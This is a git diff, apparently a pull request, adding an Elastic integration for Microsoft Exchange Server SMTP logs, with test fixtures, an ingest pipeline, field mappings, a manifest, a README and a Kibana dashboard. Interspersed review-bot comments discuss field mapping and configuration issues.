"tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:14:40.508Z", + "event": { + "ingested": "2024-03-06T15:08:18.600387259Z", + "original": "2024-01-25T15:14:40.508Z,Inbound Proxy Internal Send Connector,08DC1DB8591B229F,2,,10.11.12.13:2525,*,,\"Failed to connect. 
Winsock error code: 10061, Win32 error code: 10061, Destination domain: internalproxy, Error Message: No connection could be made because the target machine actively refused it 10.11.12.13:2525.\"" + }, + "log": { + "file": { + "path": "SmtpSend" + } + }, + "message": "2024-01-25T15:14:40.508Z,Inbound Proxy Internal Send Connector,08DC1DB8591B229F,2,,10.11.12.13:2525,*,,\"Failed to connect. Winsock error code: 10061, Win32 error code: 10061, Destination domain: internalproxy, Error Message: No connection could be made because the target machine actively refused it 10.11.12.13:2525.\"", + "microsoft": { + "exchange": { + "connectorid": "Inbound Proxy Internal Send Connector", + "context": "Failed to connect. Winsock error code: 10061, Win32 error code: 10061, Destination domain: internalproxy, Error Message: No connection could be made because the target machine actively refused it 10.11.12.13:2525.", + "event": "*", + "logtype": "smtpsend", + "remoteendpoint": "10.11.12.13:2525", + "sequencenumber": 2, + "sessionid": "08DC1DB8591B229F" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:14:39.026Z", + "event": { + "ingested": "2024-03-06T15:08:18.600391894Z", + "original": "2024-01-25T15:14:39.026Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229A,1,10.11.12.13:25,10.11.12.14:53228,>,\"220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 Jan 2024 16:14:38 +0100\"," + }, + "log": { + "file": { + "path": "SmtpRecive" + } + }, + "message": "2024-01-25T15:14:39.026Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229A,1,10.11.12.13:25,10.11.12.14:53228,>,\"220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 Jan 2024 16:14:38 +0100\",", + "microsoft": { + "exchange": { + "connectorid": "NETBIOS\\Default Frontend NETBIOS", + "data": "220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 Jan 2024 16:14:38 +0100", + "event": ">", + "localendpoint": "10.11.12.13:25", + 
"remoteendpoint": "10.11.12.14:53228", + "sequencenumber": 1, + "sessionid": "08DC1DB8591B229A" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:14:39.026Z", + "event": { + "ingested": "2024-03-06T15:08:18.600394286Z", + "original": "2024-01-25T15:14:39.026Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229B,0,10.11.12.13:25,10.11.12.14:53230,+,," + }, + "log": { + "file": { + "path": "SmtpRecive" + } + }, + "message": "2024-01-25T15:14:39.026Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229B,0,10.11.12.13:25,10.11.12.14:53230,+,,", + "microsoft": { + "exchange": { + "connectorid": "NETBIOS\\Default Frontend NETBIOS", + "event": "+", + "localendpoint": "10.11.12.13:25", + "remoteendpoint": "10.11.12.14:53230", + "sequencenumber": 0, + "sessionid": "08DC1DB8591B229B" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:14:39.031Z", + "event": { + "ingested": "2024-03-06T15:08:18.600396278Z", + "original": "2024-01-25T15:14:39.031Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229A,2,10.11.12.13:25,10.11.12.14:53228,<,EHLO mgt.my.domain.tld," + }, + "log": { + "file": { + "path": "SmtpRecive" + } + }, + "message": "2024-01-25T15:14:39.031Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229A,2,10.11.12.13:25,10.11.12.14:53228,<,EHLO mgt.my.domain.tld,", + "microsoft": { + "exchange": { + "connectorid": "NETBIOS\\Default Frontend NETBIOS", + "data": "EHLO mgt.my.domain.tld", + "event": "<", + "localendpoint": "10.11.12.13:25", + "remoteendpoint": "10.11.12.14:53228", + "sequencenumber": 2, + "sessionid": "08DC1DB8591B229A" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:14:39.066Z", + "event": { + "ingested": "2024-03-06T15:08:18.60039812Z", + "original": "2024-01-25T15:14:39.066Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229B,1,10.11.12.13:25,10.11.12.14:53230,>,\"220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 
Jan 2024 16:14:38 +0100\","
+ },
+ "log": {
+ "file": {
+ "path": "SmtpRecive"
+ }
+ },
+ "message": "2024-01-25T15:14:39.066Z,NETBIOS\\Default Frontend NETBIOS,08DC1DB8591B229B,1,10.11.12.13:25,10.11.12.14:53230,>,\"220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 Jan 2024 16:14:38 +0100\",",
+ "microsoft": {
+ "exchange": {
+ "connectorid": "NETBIOS\\Default Frontend NETBIOS",
+ "data": "220 my-mail.my.domain.tld Microsoft ESMTP MAIL Service ready at Thu, 25 Jan 2024 16:14:38 +0100",
+ "event": ">",
+ "localendpoint": "10.11.12.13:25",
+ "remoteendpoint": "10.11.12.14:53230",
+ "sequencenumber": 1,
+ "sessionid": "08DC1DB8591B229B"
+ }
+ },
+ "tags": [
+ "preserve_original_event"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/packages/microsoft_exchange_server/data_stream/smtp/agent/stream/filestream.yml.hbs b/packages/microsoft_exchange_server/data_stream/smtp/agent/stream/filestream.yml.hbs
new file mode 100644
index 00000000000..9c5a9235ed8
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/smtp/agent/stream/filestream.yml.hbs
@@ -0,0 +1,17 @@
+paths:
+{{#each paths as |path i|}}
+ - {{path}}
+{{/each}}
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag i|}}
+ - {{tag}}
+{{/each}}
+exclude_files: [".gz$"]
+processors:
+ - add_locale: ~
+{{#if processors}}
+{{processors}}
+{{/if}}
diff --git a/packages/microsoft_exchange_server/data_stream/smtp/elasticsearch/ingest_pipeline/default.yml b/packages/microsoft_exchange_server/data_stream/smtp/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..f398cf32fe5
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/smtp/elasticsearch/ingest_pipeline/default.yml
@@ -0,0 +1,49 @@
+---
+description: Pipeline for processing Exchange Server SMTP Logs
+processors:
+- drop:
+ if: "ctx.message =~ /^[^0-9]/ || ctx.message =~ /^#/"
+- set:
+ field: event.original
+ copy_from: message
+- csv:
+ field: event.original
+ ignore_failure: true
+ ignore_missing: true
+ target_fields:
+ - "@timestamp"
+ - microsoft.exchange.connectorid
+ - microsoft.exchange.sessionid
+ - microsoft.exchange.sequencenumber
+ - microsoft.exchange.localendpoint
+ - microsoft.exchange.remoteendpoint
+ - microsoft.exchange.event
+ - microsoft.exchange.data
+ - microsoft.exchange.context
+- set:
+ field: microsoft.exchange.logtype
+ if: ctx.log?.file?.path =~ /SmtpSend/
+ value: smtpsend
+ ignore_empty_value: true
+ ignore_failure: true
+- set:
+ field: microsoft.exchange.logtype
+ if: ctx.log?.file?.path =~ /SmtpReceive/
+ value: smtpreceive
+ ignore_empty_value: true
+ ignore_failure: true
+- convert:
+ field: microsoft.exchange.sequencenumber
+ type: long
+ ignore_failure: true
+- set:
+ field: event.ingested
+ copy_from: _ingest.timestamp
+ ignore_failure: true
+on_failure:
+ - set:
+ field: event.kind
+ value: pipeline_error
+ - append:
+ field: error.message
+ value: '{{{ _ingest.on_failure_message }}}'
diff --git a/packages/microsoft_exchange_server/data_stream/smtp/fields/base-fields.yml b/packages/microsoft_exchange_server/data_stream/smtp/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/smtp/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
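Review bot: The `logtype` set processor keyed on `/SmtpReceive/` cannot match the fixture shipped in this PR, whose `log.file.path` is `SmtpRecive` (the expected output earlier in the diff accordingly has no `microsoft.exchange.logtype`), so neither logtype branch is exercised by the tests and the field will stay absent in production if the glob ever picks up that same misspelling; fix the fixture path so the branch is covered. `event.original` is copied from `message` unconditionally and never removed, so the raw line is indexed twice even when the `preserve_original_event` tag is not set; the usual integration pattern is a trailing `- remove: { field: event.original, if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))", ignore_missing: true, ignore_failure: true }`. The csv processor writes the raw first column straight into `@timestamp` with no `date` processor, so a malformed or non-ISO timestamp surfaces only as an index-time rejection instead of a `pipeline_error` event that the `on_failure` block would tag. The second alternative in the drop condition, `ctx.message =~ /^#/`, is already implied by `/^[^0-9]/` and can be dropped for clarity.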
diff --git a/packages/microsoft_exchange_server/data_stream/smtp/fields/ecs.yml b/packages/microsoft_exchange_server/data_stream/smtp/fields/ecs.yml
new file mode 100644
index 00000000000..ddc5f4b0da3
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/smtp/fields/ecs.yml
@@ -0,0 +1,6 @@
+- external: ecs
+ name: message
+- external: ecs
+ name: log.file.path
+- external: ecs
+ name: tags
diff --git a/packages/microsoft_exchange_server/data_stream/smtp/fields/fields.yml b/packages/microsoft_exchange_server/data_stream/smtp/fields/fields.yml
new file mode 100644
index 00000000000..666f4652f17
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/smtp/fields/fields.yml
@@ -0,0 +1,18 @@
+- name: microsoft.exchange.connectorid
+ type: keyword
+- name: microsoft.exchange.sessionid
+ type: keyword
+- name: microsoft.exchange.sequencenumber
+ type: long
+- name: microsoft.exchange.localendpoint
+ type: keyword
+- name: microsoft.exchange.remoteendpoint
+ type: keyword
+- name: microsoft.exchange.event
+ type: keyword
+- name: microsoft.exchange.data
+ type: keyword
+- name: microsoft.exchange.context
+ type: keyword
+- name: microsoft.exchange.logtype
+ type: keyword
diff --git a/packages/microsoft_exchange_server/data_stream/smtp/manifest.yml b/packages/microsoft_exchange_server/data_stream/smtp/manifest.yml
new file mode 100644
index 00000000000..2bbee65896b
--- /dev/null
+++ b/packages/microsoft_exchange_server/data_stream/smtp/manifest.yml
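Review bot: None of the nine fields in fields.yml carries a `description`, so the generated README field table and the Kibana field popovers will be empty for this data stream, unlike the sibling `base-fields.yml` which documents every entry; add a one-liner per field, e.g. `description: Direction/type marker of the protocol log line (+ connect, - disconnect, > sent, < received, * information).` on `microsoft.exchange.event`, taking the values from the fixture. `microsoft.exchange.data` holds free-form SMTP command and response text (the fixture already shows a full server banner), so as a plain `keyword` it is presumably subject to the package default `ignore_above` and long lines such as large AUTH or DATA exchanges would be silently left unindexed; `type: text` with a keyword multi-field, or an explicit larger `ignore_above`, would be the safer choice. `localendpoint` and `remoteendpoint` are `ip:port` strings that are not mapped onto ECS `source.*`/`destination.*`, which keeps the stream out of any IP-based correlation or detection rules; splitting them in the pipeline and adding the ECS entries to `ecs.yml` would fix that.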
@@ -0,0 +1,30 @@
+title: "Exchange SMTP"
+type: logs
+streams:
+ - input: filestream
+ title: Exchange SMTP logs
+ description: Collect Exchange SMTP logs
+ vars:
+ - name: paths
+ type: text
+ title: Paths
+ required: true
+ multi: true
+ show_user: true
+ default:
+ - "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\TransportRoles\\Logs\\Hub\\ProtocolLog\\SmtpSend\\*.LOG"
+ - "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\TransportRoles\\Logs\\FrontEnd\\ProtocolLog\\SmtpReceive\\*.LOG"
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: false
+ show_user: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/fleet/current/elastic-agent-processor-configuration.html) for details.
diff --git a/packages/microsoft_exchange_server/docs/README.md b/packages/microsoft_exchange_server/docs/README.md
new file mode 100644
index 00000000000..d8a32630041
--- /dev/null
+++ b/packages/microsoft_exchange_server/docs/README.md
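Review bot: The two `default:` paths cover only `Hub\ProtocolLog\SmtpSend` and `FrontEnd\ProtocolLog\SmtpReceive`; to my knowledge Exchange 2013+ also writes the mirrored `FrontEnd\ProtocolLog\SmtpSend` and `Hub\ProtocolLog\SmtpReceive` directories once protocol logging is enabled on those connectors, so Transport-service receive logs and front-end proxy send logs are not collected out of the box. Either add those two directories to the defaults or state in the stream `description` which connector logs are covered, otherwise operators will assume all SMTP protocol logging is being ingested. The `description: Collect Exchange SMTP logs` should also mention that protocol logging is off by default and must be enabled per connector, as the README later in this diff says, since `required: true` on `paths` otherwise suggests the files already exist.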
@@ -0,0 +1,25 @@ +# Microsoft Exchange Server +The Microsoft Exchange Server integration allows you to monitor Exchange Server installations. + +## Data streams + +The Microsoft Exchange Server integration collects logs of the following streams: +- Exchange HTTPProxy Logs +- Exchange Server IMAP4 POP3 Logs +- Exchange Messagetracking Logs +- Exchange SMTP logs + +## Requirements + +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. +You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. + +## Setup + +For step-by-step instructions on how to set up an integration, see the +[Getting started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +## Setup Exchange Server + +To collect the SMTP Logs, the logs have to be configured on the exchange Server. To enable it, you can follow this [guide](https://learn.microsoft.com/en-us/exchange/mail-flow/connectors/configure-protocol-logging) +The other logs are enabled by default, and no further configurations are required diff --git a/packages/microsoft_exchange_server/img/exchange.svg b/packages/microsoft_exchange_server/img/exchange.svg new file mode 100644 index 00000000000..ad273e152dc --- /dev/null +++ b/packages/microsoft_exchange_server/img/exchange.svg @@ -0,0 +1,63 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/packages/microsoft_exchange_server/img/screenshot_httpproxy.png b/packages/microsoft_exchange_server/img/screenshot_httpproxy.png new file mode 100644 index 00000000000..e8f1bf3fe91 Binary files /dev/null and b/packages/microsoft_exchange_server/img/screenshot_httpproxy.png differ 
diff --git a/packages/microsoft_exchange_server/img/screenshot_messagtracking.png b/packages/microsoft_exchange_server/img/screenshot_messagtracking.png new file mode 100644 index 00000000000..7fea4974203 Binary files /dev/null and b/packages/microsoft_exchange_server/img/screenshot_messagtracking.png differ diff --git a/packages/microsoft_exchange_server/kibana/dashboard/microsoft_exchange_server-2b868ef0-c041-11ee-a682-0f218cc418af.json b/packages/microsoft_exchange_server/kibana/dashboard/microsoft_exchange_server-2b868ef0-c041-11ee-a682-0f218cc418af.json new file mode 100644 index 00000000000..18a0ed7fc4b --- /dev/null +++ b/packages/microsoft_exchange_server/kibana/dashboard/microsoft_exchange_server-2b868ef0-c041-11ee-a682-0f218cc418af.json 
@@ -0,0 +1,729 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"3d2a1e85-63b4-441e-ab8c-daa2649a4347\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"3d2a1e85-63b4-441e-ab8c-daa2649a4347\",\"fieldName\":\"email.from.address\",\"title\":\"Sender\",\"grow\":true,\"width\":\"medium\",\"searchTechnique\":\"wildcard\",\"enhancements\":{}}},\"fd53de73-57dd-43b2-bebb-568d827bb1c0\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"fd53de73-57dd-43b2-bebb-568d827bb1c0\",\"fieldName\":\"email.to.address\",\"title\":\"Recipient\",\"grow\":true,\"width\":\"medium\",\"searchTechnique\":\"wildcard\",\"enhancements\":{}}},\"9ecedc0a-e663-453f-8749-a65c1a7afdb2\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"9ecedc0a-e663-453f-8749-a65c1a7afdb2\",\"fieldName\":\"email.direction\",\"title\":\"Direction\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"18aa9b9b-bcce-49ad-98b3-2f5922e86ec5\":{\"type\":\"optionsListControl\",\"order\":3,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"18aa9b9b-bcce-49ad-98b3-2f5922e86ec5\",\"fieldName\":\"email.message_id\",\"title\":\"Message ID\",\"grow\":true,\"width\":\"medium\",\"searchTechnique\":\"wildcard\",\"enhancements\":{}}}}" + }, + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": 
"microsoft_exchange_server.messagetracking" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.messagetracking" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": true, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5e5eebc9-c386-4646-acb3-dc5a73fcf3d5", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6555a537-2dbe-4a56-b24b-afbd842150c8": { + "columnOrder": [ + "c4931f6a-7fe1-48fc-9954-c0270412b48d" + ], + "columns": { + "c4931f6a-7fe1-48fc-9954-c0270412b48d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Unique Mails", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "email.message_id" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "5e5eebc9-c386-4646-acb3-dc5a73fcf3d5", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.messagetracking" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.messagetracking" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "6555a537-2dbe-4a56-b24b-afbd842150c8", + "layerType": 
"data", + "metricAccessor": "c4931f6a-7fe1-48fc-9954-c0270412b48d" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 5, + "i": "cf08de60-285a-4631-a8bc-f82f2b0d8ff2", + "w": 5, + "x": 0, + "y": 0 + }, + "panelIndex": "cf08de60-285a-4631-a8bc-f82f2b0d8ff2", + "title": "", + "type": "lens", + "version": "8.10.4" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "27ddc785-e09f-4f3c-9ecc-296dd4850ed7", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6555a537-2dbe-4a56-b24b-afbd842150c8": { + "columnOrder": [ + "c4931f6a-7fe1-48fc-9954-c0270412b48d" + ], + "columns": { + "c4931f6a-7fe1-48fc-9954-c0270412b48d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Bytes", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "network.bytes" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "27ddc785-e09f-4f3c-9ecc-296dd4850ed7", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.messagetracking" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.messagetracking" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": 
"6555a537-2dbe-4a56-b24b-afbd842150c8", + "layerType": "data", + "metricAccessor": "c4931f6a-7fe1-48fc-9954-c0270412b48d" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 5, + "i": "c49fa1b0-d063-47ef-aaea-ddbb86a55c5d", + "w": 5, + "x": 5, + "y": 0 + }, + "panelIndex": "c49fa1b0-d063-47ef-aaea-ddbb86a55c5d", + "title": "", + "type": "lens", + "version": "8.10.4" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-87a010e4-c30d-4e6f-bc3d-92243524aab9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "dd24428d-5254-4f78-b5c6-9d86a5d91936", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "87a010e4-c30d-4e6f-bc3d-92243524aab9": { + "columnOrder": [ + "7cf0d637-3c30-4985-9e33-bbd10815068f", + "8369ed93-f022-456d-8271-52ab4184930b" + ], + "columns": { + "7cf0d637-3c30-4985-9e33-bbd10815068f": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "8369ed93-f022-456d-8271-52ab4184930b": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "dd24428d-5254-4f78-b5c6-9d86a5d91936", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": 
"microsoft_exchange_server.messagetracking" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.messagetracking" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "8369ed93-f022-456d-8271-52ab4184930b" + ], + "layerId": "87a010e4-c30d-4e6f-bc3d-92243524aab9", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "7cf0d637-3c30-4985-9e33-bbd10815068f" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {} + }, + "gridData": { + "h": 10, + "i": "c2941fdd-a809-4df1-9e6d-d7eee27beb94", + "w": 38, + "x": 10, + "y": 0 + }, + "panelIndex": "c2941fdd-a809-4df1-9e6d-d7eee27beb94", + "type": "lens", + "version": "8.10.4" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "babc91d8-a1dc-460e-91a5-d4ed43b2f403", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6555a537-2dbe-4a56-b24b-afbd842150c8": { + "columnOrder": [ + "c4931f6a-7fe1-48fc-9954-c0270412b48d" + ], + "columns": { + "c4931f6a-7fe1-48fc-9954-c0270412b48d": { + "customLabel": true, + 
"dataType": "number", + "isBucketed": false, + "label": "Unique Sender", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "email.sender.address" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "babc91d8-a1dc-460e-91a5-d4ed43b2f403", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.messagetracking" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.messagetracking" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "6555a537-2dbe-4a56-b24b-afbd842150c8", + "layerType": "data", + "metricAccessor": "c4931f6a-7fe1-48fc-9954-c0270412b48d" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 5, + "i": "c76a7520-c667-4361-b6d3-c4456707745c", + "w": 5, + "x": 0, + "y": 5 + }, + "panelIndex": "c76a7520-c667-4361-b6d3-c4456707745c", + "type": "lens", + "version": "8.10.4" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-6555a537-2dbe-4a56-b24b-afbd842150c8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "599c1b5b-7d55-4694-b3b2-7ba02c4753e6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "6555a537-2dbe-4a56-b24b-afbd842150c8": { + "columnOrder": [ + "c4931f6a-7fe1-48fc-9954-c0270412b48d" + ], + "columns": { + "c4931f6a-7fe1-48fc-9954-c0270412b48d": { + "customLabel": true, + "dataType": "number", + 
"isBucketed": false, + "label": "Unique recipients", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "email.to.address" + } + }, + "incompleteColumns": {} + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "599c1b5b-7d55-4694-b3b2-7ba02c4753e6", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "microsoft_exchange_server.messagetracking" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "microsoft_exchange_server.messagetracking" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layerId": "6555a537-2dbe-4a56-b24b-afbd842150c8", + "layerType": "data", + "metricAccessor": "c4931f6a-7fe1-48fc-9954-c0270412b48d" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {} + }, + "gridData": { + "h": 5, + "i": "4b074730-0383-424e-94db-29a8e9147189", + "w": 5, + "x": 5, + "y": 5 + }, + "panelIndex": "4b074730-0383-424e-94db-29a8e9147189", + "title": "", + "type": "lens", + "version": "8.10.4" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 22, + "i": "2028bea0-99d5-4ec6-a790-be7642c5a083", + "w": 48, + "x": 0, + "y": 10 + }, + "panelIndex": "2028bea0-99d5-4ec6-a790-be7642c5a083", + "panelRefName": "panel_2028bea0-99d5-4ec6-a790-be7642c5a083", + "type": "search", + "version": "8.10.4" + } + ], + "timeRestore": false, + "title": "[Logs Exchange Server] Messagetracking", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-11T10:14:48.072Z", + "id": "microsoft_exchange_server-2b868ef0-c041-11ee-a682-0f218cc418af", + "managed": true, + "references": [ + { + "id": "logs-*", + 
